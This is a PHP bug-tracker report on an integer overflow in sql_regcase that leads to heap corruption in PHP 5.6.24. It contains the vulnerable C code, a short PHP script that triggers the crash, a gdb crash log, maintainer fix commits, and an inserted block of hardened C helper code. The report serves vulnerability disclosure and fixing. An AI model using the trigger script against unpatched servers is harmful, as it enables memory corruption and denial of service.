Bug #72838 Integer overflow lead to heap corruption in sql_regcase
Submitted: 2016-08-15 07:22 UTC Modified: 2017-02-13 01:45 UTC
From: minhrau dot vc dot 365 at gmail dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.6.24 OS: ALL
Private report: No CVE-ID: None
 [2016-08-15 07:22 UTC] minhrau dot vc dot 365 at gmail dot com
Description:
------------
An integer overflow in the sql_regcase function will lead to heap corruption. Please see the comment about this vulnerability below:

PHP_EREG_API PHP_FUNCTION(sql_regcase)
{
	char *string, *tmp;
	int string_len;
	unsigned char c;
	register int i, j;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &string, &string_len) == FAILURE) {
		return;
	}
	
	tmp = safe_emalloc(string_len, 4, 1); // if string_len = INT_MAX + 1, the size supplied to safe_emalloc will be 1
	                                      // It'll lead to the heap corruption in the loop below. Please check the crash log for more detail.
	
	for (i = j = 0; i < string_len; i++) {
		c = (unsigned char) string[i];
		if (isalpha(c)) {
			tmp[j++] = '[';
			tmp[j++] = toupper(c);
			tmp[j++] = tolower(c);
			tmp[j++] = ']';
		} else {
			tmp[j++] = c;
		}
	}

Test script:
---------------
<?php

ini_set('memory_limit', -1);

$str = str_repeat('x', 0xffffffff/4)."a";

$str1 = sql_regcase($str);

?>


Expected result:
----------------
No crash

Actual result:
--------------
(gdb) b ereg.c:742
Breakpoint 1 at 0x4632e4: file /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c, line 742.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testsql_regcase_negativelength.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Breakpoint 1, zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:742
742		tmp = safe_emalloc(string_len, 4, 1);
(gdb) p string_len
$1 = 1073741824
(gdb) p string_len*4+1
$2 = 1
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x000000000046332c in zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:747
747				tmp[j++] = '[';
(gdb) bt
#0  0x000000000046332c in zif_sql_regcase (ht=<optimized out>, return_value=0x7ffff7fa2fb0, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>) at /home/minhrau/PHP-5.6.24/ext/ereg/ereg.c:747
#1  0x00000000007f908d in zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558
#2  0x0000000000783b4e in execute_ex (execute_data=0x7ffff7f6f260) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363
#3  0x000000000074ed41 in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341
#4  0x00000000006ed0d0 in php_execute_script (primary_file=primary_file@entry=0x7fffffffd0e0) at /home/minhrau/PHP-5.6.24/main/main.c:2613
#5  0x00000000007faa97 in do_cli (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994
#6  0x00000000004361e4 in main (argc=2, argv=0xf8c960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378
(gdb) 
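The arithmetic behind the report, as an added example (not PHP's code and not the reporter's): every alphabetic byte expands to four bytes, so both the allocation size and the output index grow as 4 * length + 1, which does not fit in a 32-bit int once the input reaches 0x40000000 bytes. The hypothetical helpers below show the 32-bit wraparound with well-defined unsigned arithmetic, a pre-check a caller can apply, and a size_t-based expansion that refuses inputs whose expanded size cannot be represented.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper, not PHP's code: report whether the worst-case
 * expanded size (4 bytes per input byte plus a NUL) fits in a 32-bit int.
 * The largest input that fits is (INT32_MAX - 1) / 4 = 536870911 bytes. */
bool regcase_len_fits_int32(size_t len)
{
    return len <= (size_t)(INT32_MAX - 1) / 4;
}

/* Show the wraparound the report describes using well-defined unsigned
 * 32-bit arithmetic: 0x40000000 * 4 + 1 wraps to 1. */
uint32_t regcase_size_wrapped32(uint32_t len)
{
    return len * 4u + 1u;
}

/* Hardened expansion: size_t lengths, an explicit overflow check before
 * allocating, and a size_t output index that cannot wrap while i < len.
 * Returns NULL when the expanded size is unrepresentable; caller frees. */
char *regcase_expand_checked(const char *s, size_t len)
{
    if (len > (SIZE_MAX - 1) / 4) {
        return NULL;              /* len * 4 + 1 would overflow size_t */
    }
    char *tmp = malloc(len * 4 + 1);
    if (tmp == NULL) {
        return NULL;
    }
    size_t j = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (isalpha(c)) {
            tmp[j++] = '[';
            tmp[j++] = (char)toupper(c);
            tmp[j++] = (char)tolower(c);
            tmp[j++] = ']';
        } else {
            tmp[j++] = (char)c;
        }
    }
    tmp[j] = '\0';
    return tmp;
}
```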


 [2016-08-16 06:50 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-08-16 06:50 UTC] stas@php.net
The fix is in security repo as 165336bfa6c06bb90f5ee4e70fc248e072bbf96c and in https://gist.github.com/ae822865b9f445fed46bde0654046df3

please verify
 [2016-08-16 07:26 UTC] minhrau dot vc dot 365 at gmail dot com
This patch looks good.
 [2016-08-17 05:57 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - Integer overflow lead to heap corruption in sql_regcase
 [2016-08-17 05:57 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - Integer overflow lead to heap corruption in sql_regcase
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - Integer overflow lead to heap corruption in sql_regcase
 [2016-08-18 11:15 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6ba48cff6c31094bc1a6233e023c3a2fcd91ab7a
Log: Fix bug #72838 - Integer overflow lead to heap corruption in sql_regcase
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f91f692c354e45b9b46ba672f4182ff478bd1a3
Log: Fix bug #72838 - Integer overflow lead to heap corruption in sql_regcase
 [2017-02-13 01:45 UTC] stas@php.net
-Type: Security +Type: Bug
Last updated: Sat Nov 23 08:01:28 2024 UTC